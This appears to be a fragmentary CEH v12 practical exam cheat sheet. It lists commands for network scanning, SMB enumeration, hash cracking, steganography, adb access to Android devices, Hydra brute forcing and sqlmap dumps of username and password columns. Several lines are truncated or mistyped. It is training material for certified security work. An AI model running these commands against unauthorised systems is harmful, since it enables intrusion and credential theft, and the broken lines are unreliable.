CEH v12 practical resources
Last updated
Last updated
Read all questions carefully
Enumerate sub-net
nmap -sn IP | tee nmap_ping_sweep.txt
Enumerate ports
nmap -A -p- -v -iL ip_list.txt | nmap_port_scan.txt
Snow — Stegnography
Open Stego
Crypttool
BCTextEncoder
How many machines are active in a network - net discover -i 192.168.1.0/24
mstsc
-o output
-S wordlist
robuster dir -u 10.10.10.10 -w /usr/share/dirb/wordlists/common.txt -x .txt
OR
FTP Login - ftp <ip>
get <file name> (to get file from FTP login)
SSH Login - SSH username@10.10.10.10
Nmap -A 10.10.10.10 (aggressive scan- Traceroute, T4, OS)
nmap -sC (service scan)
nmap -sV (version scan)
nmap -sP 10.10.10.10/24 (how many hosts are up in the whole network)/ping scan
nmap -sL (hostnames)
nmap -oN <filename> (to save output in a file)
nmap -F (fast scan)
nmap -O (os scan)
hashid -m <hash> (to identify the type of hash, its mode etc)
hashcat -m <mode> -a 0 <hashhhhhhhh> /usr/share/wordlist/rockyou.txt
crackstation
Cyberchef
Global network inventory
Netbios enumerator
Hyena
Superscan
Advanced ip scanner
nmap --script smb-os-discovery.nse -p445 <ip> (enumerate os, domain name,etc)
nmap --script smb-enum-users.nse -p445 <ip> (used to enumerate all users on remote Windows system using SAMR enumeration and LSA bruteforcing)
nmap -p 445 --script=smb-enum-shares.nse, smb-enum-users.nse 10.10.19.21 (smb users and shares)
smbclient //10.10.19.21/anonymous (accessing smb shares)
smbget -R smb://10.10.19.21/anonymous (downloading smb files)
Enum4linux
enum4linux -u martin -p apple -U 10.10.10.12 | - u user -p pass -U get user list
enum4linux -u martin -p apple -o 10.10.10.12 | -o get OS info
enum4linux -u martin -p apple -P 10.10.10.12 | -P get password policy info
enum4linux -u martin -p apple -G 10.10.10.12 | -G get groups and members info
enum4linux -u martin -p apple -S 10.10.10.12 | -S get share list info
enum4linux -u martin -p apple -a 10.10.10.12 | -a get all simple enumeration data [-U -S -G -P -r -o -n -i]
wpscan --url http://[IP Address]:8080/CEH --enumerate u (enumerate the usernames stored in the website’s database)
Hashcalc
Md5 calculator
Cryptool – decode .hex file
Bctextencoder – decrypt text using secret key
Veracrypt – anything related to volume
Steganography-
Steghide embed -ef <filename> -cf <image> -p <passphrase>
Steghide extract -sf <image> (extract hidden data from image)
Stegcracker <image> /usr/share/wordlists/rockyou.txt (crack the passphrase of image)
sha256sum <filename> (find hash of the file)
via USB
./adb tcpip 5555
./adb connect 192.168.43.117:5555
./adb devices
./adb -d shell (Direct an adb command to the only attached USB device)
ls
cd sdcard
ls
cd dcim
cd camera
ls
< pc location > <android location>
./adb pull /sdcard/Download/magisk_patched.img C:\platform-tools (from android to pc)
< android location > <pc location>
(for cookies- console->document.cookie)
(dump whole table)
OR
(dump individual column data)
skipfish -o /root/test -S /usr/share/skipfish/dictionaries/complete.wl
uniscan -u -q (for directories)
uniscan –u -we (enable file check like robots.txt and sitemap.xml)
get
nikto -h -Tuning 1
Hydra -L username -P /usr/share/wordlists/rockyou.txt
Crack hashes- , cyberchef
(online steganography tool)
./adb push C:\platform-tools\ /sdcard/Download (from pc to android)
site: php?= (for finding vulnerable site)
sqlmap -u --dbs (databases)
sqlmap -u -D acuart –tables (tables)
sqlmap -u -D acuart -T users --columns (columns)
sqlmap -u -D acuart -T users --dump
sqlmap -u -D acuart -T users -C uname --dump
sqlmap -u -D acuart -T users -C pass --dump